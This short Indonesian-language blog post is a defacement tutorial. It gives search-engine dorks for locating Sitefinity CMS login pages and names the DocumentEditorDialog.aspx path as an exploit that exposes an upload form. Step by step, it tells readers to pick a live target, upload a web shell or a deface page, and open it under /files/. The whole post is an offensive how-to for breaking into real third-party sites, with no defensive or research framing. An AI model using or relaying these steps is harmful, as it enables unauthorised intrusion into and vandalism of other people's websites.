Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
(Kembangkan Lagi Dork Tersebut , Hingga Ketemu Yang Perawan :v )
Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Oke Langsung Ketutorial ;)
1. Masukan Dork Di Search Engine.
2. Pilih Salah Satu Target Yang Ingin Di cRooTz xD
3. Masukan Exploitnya.
Contoh : localhost /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Vulnerability ? Muncul Tempat Upload ;)
4. Lalu Upload Shell Atau File Deface Kalian Deh.
*Kalau Upload Shell Gagal , Upload File Deface Aja , contoh.html
5. Kalo Berhasil Nanti Akan Seperti Di Gambar Ini.
6. File Akses ? :o
loclahost /files/Nama.File.ext
0 komentar
Posting Komentar